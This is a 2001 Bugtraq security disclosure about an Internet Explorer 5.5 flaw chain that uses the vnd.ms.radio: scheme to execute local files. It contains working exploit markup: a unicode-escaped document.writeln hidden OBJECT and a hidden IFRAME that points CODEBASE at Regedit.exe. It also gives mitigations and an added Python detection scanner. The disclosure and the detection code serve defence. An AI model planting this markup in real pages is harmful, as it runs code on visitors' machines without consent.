[19981] in bugtraq
HTML.cobble
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Sun Apr 1 13:14:05 2001
Message-ID: <15005997.986102168088.JavaMail.imail@goochy.excite.com>
Date: Sat, 31 Mar 2001 21:16:02 -0800
Reply-To: http-equiv@excite.com
From: "http-equiv@excite.com" <http-equiv@excite.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Sunday, April 1, 2001
Default installation of Internet Explorer 5.5 with all of its so-called
patches, service "packs" etc., still allows us to execute files on default
installations of the target computer:
Once Again:
We cobble together new and old components as follows:
1. Courtesy of Georgi Guninski (http://www.securityfocus.com/bid/1978)
2. Courtesy of Dildog (http://www.securityfocus.com/bid/1394)
3. vnd.ms.radio:http://www.malware.com/
Internet Explorer 5.5 has a "neat" built-in radio system. An oft touted
wonder feature. This incredible feature enjoys its own url scheme, the
so-called "vnd.ms.radio:". What we then do is take our Georgi Guninski
<object data="" type="text/html"> and point it to our so-called
"vnd.ms.radio:" *.url.
But first we create yet another html page comprising our generic object
courtesy of Dildog and point that to the file we wish to execute.
Specifically:
Component 1
document.writeln('\u003c\u004f\u0042\u004a\u0045\u0043\u0054\u0020\u0044\u0041\u0054\u0041\u003d\u0022\u0043\u003a\u005c\u0057\u0049\u004e\u0044\u004f\u0057\u0053\u005c\u0054\u0045\u004d\u0050\u005c\u0072\u0061\u0064\u0069\u006f\u002e\u0075\u0072\u006c\u0022\u0020\u0054\u0059\u0050\u0045\u003d\u0022\u0074\u0065\u0078\u0074\u002f\u0068\u0074\u006d\u006c\u0022\u0020\u0057\u0049\u0044\u0054\u0048\u003d\u0032\u0030\u0030\u0020\u0048\u0045\u0049\u0047\u0048\u0054\u003d\u0032\u0030\u0030\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u004f\u0042\u004a\u0045\u0043\u0054\u003e');
// the \uXXXX escapes above decode to:
// <OBJECT DATA="C:\WINDOWS\TEMP\radio.url" TYPE="text/html" WIDTH=200 HEIGHT=200 style="display:none"></OBJECT>
Component 2
<IFRAME
SRC="vnd.ms.radio:http://www.malware.com/infosec/US-eng/drivel/hahaha?<BODY><OBJECT
CLASSID='CLSID:10000000-0000-0000-0000-000000000000'
CODEBASE='C:\WINDOWS\Regedit.exe'></OBJECT> </BODY></HTML>" WIDTH=100
HEIGHT=100 STYLE="DISPLAY:NONE"></IFRAME>
What happens is our so-called "vnd.ms.radio:" url is called, but because
there is no 'real' audio file to play, it creates a named file in
our C:\WINDOWS\TEMP. We include in the so-called "vnd.ms.radio:" url our
code to execute our file. We then call our so-called "vnd.ms.radio:" *.url
through our Component 1, which parses it as html and in turn, being outside
the so-called "Security Zones", fires our generic object, which then executes
our file:
Working Example:
[note: tested on a default installation of Win98 and a default installation of
IE5.5, both patched to the hilt]
http://www.malware.com/drivel.html
Notes:
1. Again, default installs of both the OS and IE5.5 (both fully patched as of
today's date)
2. Unable to include external code at this time. No time. No interest.
3. Monster 1.5Meg patch dated August 09, 2000 does absolutely nothing
(http://www.microsoft.com/technet/security/bulletin/MS00-055.asp)
4. Disable ActiveX and Scripting and relocate the temp folder.
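The chain above rests on three things a content filter or proxy can look for: a
document.write string literal built entirely from \uXXXX escapes (Component 1),
an OBJECT that renders a local drive path as text/html, and an IFRAME whose SRC
uses the vnd.ms.radio: scheme with HTML and a local CODEBASE stuffed into it
(Component 2). The Python below is an added detection example, not code from
the original post or from malware.com; the rule names, the helper
js_unicode_escape() and the sample page it builds (with a placeholder host
instead of the original URL) are all constructed here for the demonstration.

```python
import re

# --- decoding ---------------------------------------------------------------
# \uXXXX escapes as used inside JavaScript string literals
UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")


def decode_js_unicode(s):
    """Turn \\uXXXX escapes back into characters (decoder for Component 1 style)."""
    return UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), s)


# document.write('...') / document.writeln("...") with a single string literal
WRITE_CALL = re.compile(r"document\.write(?:ln)?\(\s*(['\"])(.*?)\1\s*\)", re.S)


def expand_script_writes(html):
    """Replace every document.write(ln)('...') call by its decoded literal.

    The markup the script would have emitted at runtime then becomes visible
    to the plain-text rules below.
    """
    return WRITE_CALL.sub(lambda m: decode_js_unicode(m.group(2)), html)


# --- detection rules (names are constructed for this example) -----------------
RULES = [
    # any DATA/CODEBASE/SRC attribute that points at a local drive letter path
    ("local-path-in-attribute",
     re.compile(r"""\b(?:data|codebase|src)\s*=\s*['"]?[a-z]:\\[^'"\s>]+""", re.I)),
    # the IE 5.5 radio bar url scheme abused by Component 2
    ("vnd.ms.radio-scheme",
     re.compile(r"vnd\.ms\.radio:", re.I)),
    # an OBJECT rendering a local file as HTML (the Guninski object of Component 1)
    ("object-rendering-local-file-as-html",
     re.compile(r"""<object[^>]*\bdata\s*=\s*['"]?[a-z]:\\[^>]*\btype\s*=\s*['"]?text/html""",
                re.I | re.S)),
    # a frame or object hidden from the user with display:none
    ("hidden-frame-or-object",
     re.compile(r"""<(?:iframe|object)[^>]*display\s*:\s*none""", re.I | re.S)),
]


def scan_html(html):
    """Return the names of all rules that fire on the page (after write-expansion)."""
    expanded = expand_script_writes(html)
    return [name for name, rx in RULES if rx.search(expanded)]


# --- constructed sample input --------------------------------------------------
def js_unicode_escape(s):
    """Constructed helper: obfuscate a string the way Component 1 is obfuscated."""
    return "".join("\\u%04x" % ord(c) for c in s)


COMPONENT_1_HTML = ('<OBJECT DATA="C:\\WINDOWS\\TEMP\\radio.url" TYPE="text/html" '
                    'WIDTH=200 HEIGHT=200 style="display:none"></OBJECT>')

# Sample page assembled from the two components; example.invalid is a placeholder host.
SAMPLE_PAGE = (
    "<html><script>document.writeln('" + js_unicode_escape(COMPONENT_1_HTML) + "');</script>\n"
    "<IFRAME SRC=\"vnd.ms.radio:http://example.invalid/x?<BODY><OBJECT "
    "CLASSID='CLSID:10000000-0000-0000-0000-000000000000' "
    "CODEBASE='C:\\WINDOWS\\Regedit.exe'></OBJECT></BODY></HTML>\" "
    "WIDTH=100 HEIGHT=100 STYLE=\"DISPLAY:NONE\"></IFRAME></html>"
)

BENIGN_PAGE = "<html><p>hello</p><iframe src='https://example.invalid/'></iframe></html>"

if __name__ == "__main__":
    print("sample :", scan_html(SAMPLE_PAGE))
    print("benign :", scan_html(BENIGN_PAGE))
```

The expansion step matters: without decoding the document.writeln literal, the
first, third and fourth rules see nothing but \u escapes. Any one of the rules
firing on its own is only a hint; all four together on one page is the pattern
described in this post.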
---
http://www.malware.com